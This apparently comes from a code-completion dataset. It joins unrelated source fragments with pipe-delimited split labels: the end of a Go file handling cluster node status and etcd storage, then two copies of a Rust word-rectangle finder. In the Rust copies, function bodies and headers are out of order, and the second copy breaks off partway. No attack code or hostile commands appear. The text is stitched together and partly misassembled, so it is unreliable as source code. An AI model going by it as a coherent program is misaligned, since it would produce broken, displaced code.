ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
}
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
} | type NodeStatus struct { | random_line_split |
main.rs | //#![feature(exclusive_range_pattern)]
#![feature(nll)]
extern crate fnv;
extern crate spmc;
extern crate unicode_skeleton;
#[macro_use]
extern crate clap;
use std::default::Default;
use std::vec::Vec;
use std::io::{self, BufReader, BufWriter};
use std::io::prelude::*;
use std::fs::File;
use std::thread;
use fnv::FnvHashMap;
use unicode_skeleton::UnicodeSkeleton;
use clap::{Arg, App, SubCommand, ArgMatches};
macro_rules! make_encode_decode {
(
$( $num:expr => $char:expr; )+
) => {
fn encode(from:char) -> Option<u8> {
let res:u8 = match from {
$(
$char => $num,
)+
_ => return None,
};
return Some(res)
}
fn decode(code:u8) -> Option<char> {
let res:char = match code {
$(
$num => $char,
)+
255 => '#',
32 => '$',
_ => return None,
};
return Some(res)
}
}
}
make_encode_decode!{
0 => 'a';
1 => 'e';
2 => 'i';
3 => 'o';
4 => 'r';
5 => 'n';
6 => 'l';
7 => 's';
8 => 't';
9 => 'u';
10 => 'p';
11 => 'c';
12 => 'd';
13 => 'k';
14 => 'y';
15 => 'g';
16 => 'h';
17 => 'b';
18 => 'v';
19 => 'f';
20 => 'w';
21 => 'z';
22 => 'j';
23 => 'x';
24 => '\'';
25 => '-';
26 => 'è';
27 => 'ê';
28 => 'ñ';
29 => 'é';
30 => 'm';
31 => 'q';
}
#[derive(Debug,Clone,Copy,PartialEq,Eq)]
struct CharSet {
pub internal:u32
}
impl CharSet {
fn new(internal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
| filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words_index(
f_in: impl BufRead,
ignore_unencodeable: bool,
) -> io::Result<(u32, u32, WordIndex)> {
let mut index = WordIndex::default();
let mut count_row_words = 0;
#[cfg(not(feature = "square"))]
let mut count_col_words = 0;
let lines = f_in.lines();
for line_result in lines {
let word = line_result?;
let chars:Vec<char> = word.chars().collect();
if chars.len() != WORD_SQUARE_WIDTH && chars.len() != WORD_SQUARE_HEIGHT { continue }
let mut codes = Vec::new();
let mut all_encoded = true;
for c in chars.clone() {
match encode(c) {
Some(code) => codes.push(code),
None => {
all_encoded = false;
continue
},
}
}
if !all_encoded {
if !ignore_unencodeable {
eprintln!("Skipping {:?}, not all could be encoded",chars);
}
continue
}
if codes.len() == WORD_SQUARE_WIDTH {
count_row_words += 1;
let words_index = index.rows_mut();
let mut word = WideWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_WIDTH {
let i = (WORD_SQUARE_WIDTH - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
#[cfg(not(feature = "square"))]
if codes.len() == WORD_SQUARE_HEIGHT {
count_col_words += 1;
let words_index = index.cols_mut();
let mut word = TallWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_HEIGHT {
let i = (WORD_SQUARE_HEIGHT - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
}
#[cfg(feature = "square")]
let count_col_words = count_row_words;
return Ok((count_row_words, count_col_words, index));
}
fn compute_command(args:&ArgMatches) -> io::Result<()> {
let loud = !args.is_present("quiet");
let ignore_empty_wordlist = args.is_present("ignore-empty-wordlist");
let ignore_unencodeable = args.is_present("ignore-unencodeable");
if loud {
eprintln!("Word square order is {}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT);
eprintln!("Start: creating index.");
}
let num_threads:u32 = args.value_of("threads").unwrap().parse().unwrap();
let plain_f = File::open(args.value_of("wordlist").unwrap())?;
let f = BufReader::new(plain_f);
let (count_row_words, count_col_words, index) = make_words_index(f, ignore_unencodeable)?;
if !ignore_empty_wordlist && (index.rows().is_empty() || index.cols().is_empty()) {
panic!("No words in wordlist!");
}
if loud {
eprintln!("Finished creating index, {} words x {} words.", count_row_words, count_col_words);
}
let (m2w_tx, m2w_rx) = spmc::channel::<(WordSquare,u8)>();
let (w2m_tx, w2m_rx) = std::sync::mpsc::sync_channel(16);
let mut worker_handles = Vec::new();
if loud {
eprintln!("Creating {} worker threads.", num_threads);
}
let index_arc = std::sync::Arc::new(index);
for _ in 0..num_threads {
let rxc = m2w_rx.clone();
let txc = w2m_tx.clone();
let my_index = std::sync::Arc::clone(&index_arc);
worker_handles.push(
thread::spawn( move || {
while let Ok(msg) = rxc.recv() {
compute(
&my_index,
msg.0,
msg.1,
WORD_SQUARE_SIZE as u8,
|a,b| txc.send((a,b)).unwrap()
);
}
})
);
}
drop(w2m_tx);
let printing_thread = thread::spawn(move || {
while let Ok(msg) = w2m_rx.recv() {
print_word_square(msg.0);
}
});
let code_array = [255u8; WORD_SQUARE_SIZE];
if loud {
eprintln!("Starting.");
}
compute(
index_arc.as_ref(),
code_array,
0u8,
WORD_SQUARE_WIDTH as u8,
|ca, idx| m2w_tx.send((ca,idx)).unwrap()
);
drop(m2w_tx);
//println!("Dropped");
for h in worker_handles {
h.join().unwrap();
//println!("Worker finished");
}
printing_thread.join().unwrap();
//println!("printing thread finished");
/*let mut char_counts:Vec<(char,u64)> = unused_chars.drain().collect();
char_counts.sort_unstable_by_key(|t| t.1);
for (k,v) in char_counts.iter() {
println!("Char {:?} had {} instances", k, v);
}*/
Ok(())
}
const DEBUG_MODE:bool = false;
fn compute<T:FnMut(WordSquare,u8)>(
words_index_arg:&WordIndex,
mut code_array:WordSquare,
start_idx:u8,
target_idx:u8,
mut on_result:T,
) {
let mut at_idx = start_idx;
let mut charset_array = [CharSet::new(std::u32::MAX); WORD_SQUARE_SIZE];
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
// wrap to go from 0 to 255
let end_idx = start_idx.wrapping_sub(1);
while at_idx != end_idx {
// wrap to go from 255 (initial) to 0
if DEBUG_MODE {
println!();
println!(
"idx {} before wrapping add is {}",
at_idx,
code_array[at_idx as usize]
);
}
code_array[at_idx as usize] = code_array[at_idx as usize].wrapping_add(1);
if DEBUG_MODE {
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
for row in 0..WORD_SQUARE_HEIGHT {
for col in 0..WORD_SQUARE_WIDTH {
print!("{}, ", decode(code_array[row*WORD_SQUARE_WIDTH + col]).unwrap());
}
println!();
}
println!("row_idx {}, col_idx {}", row_idx, col_idx);
}
let cur_code = code_array[at_idx as usize];
if DEBUG_MODE { println!("cur_code {}", cur_code); }
let cur_charset = charset_array[at_idx as usize];
if cur_code == 32 {
code_array[at_idx as usize] = 255u8;
at_idx = at_idx.wrapping_sub(1)
} else if cur_charset.has(cur_code) {
at_idx += 1;
if at_idx == target_idx {
//print_word_square(code_array);
(&mut on_result)(code_array, at_idx);
at_idx -= 1;
} else {
code_array[at_idx as usize] = 255;
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
//println!("row_word {:?}", row_word);
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
//println!("col_word {:?}", row_word);
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
}
}
}
}
| let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!())
.author(crate_authors!())
.about(crate_description!())
.setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn | identifier_body |
main.rs | //#![feature(exclusive_range_pattern)]
#![feature(nll)]
extern crate fnv;
extern crate spmc;
extern crate unicode_skeleton;
#[macro_use]
extern crate clap;
use std::default::Default;
use std::vec::Vec;
use std::io::{self, BufReader, BufWriter};
use std::io::prelude::*;
use std::fs::File;
use std::thread;
use fnv::FnvHashMap;
use unicode_skeleton::UnicodeSkeleton;
use clap::{Arg, App, SubCommand, ArgMatches};
macro_rules! make_encode_decode {
(
$( $num:expr => $char:expr; )+
) => {
fn encode(from:char) -> Option<u8> {
let res:u8 = match from {
$(
$char => $num,
)+
_ => return None,
};
return Some(res)
}
fn decode(code:u8) -> Option<char> {
let res:char = match code {
$(
$num => $char,
)+
255 => '#',
32 => '$',
_ => return None,
};
return Some(res)
}
}
}
make_encode_decode!{
0 => 'a';
1 => 'e';
2 => 'i';
3 => 'o';
4 => 'r';
5 => 'n';
6 => 'l';
7 => 's';
8 => 't';
9 => 'u';
10 => 'p';
11 => 'c';
12 => 'd';
13 => 'k';
14 => 'y';
15 => 'g';
16 => 'h';
17 => 'b';
18 => 'v';
19 => 'f';
20 => 'w';
21 => 'z';
22 => 'j';
23 => 'x';
24 => '\'';
25 => '-';
26 => 'è';
27 => 'ê';
28 => 'ñ';
29 => 'é';
30 => 'm';
31 => 'q';
}
#[derive(Debug,Clone,Copy,PartialEq,Eq)]
struct CharSet {
pub internal:u32
}
impl CharSet {
fn new(internal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
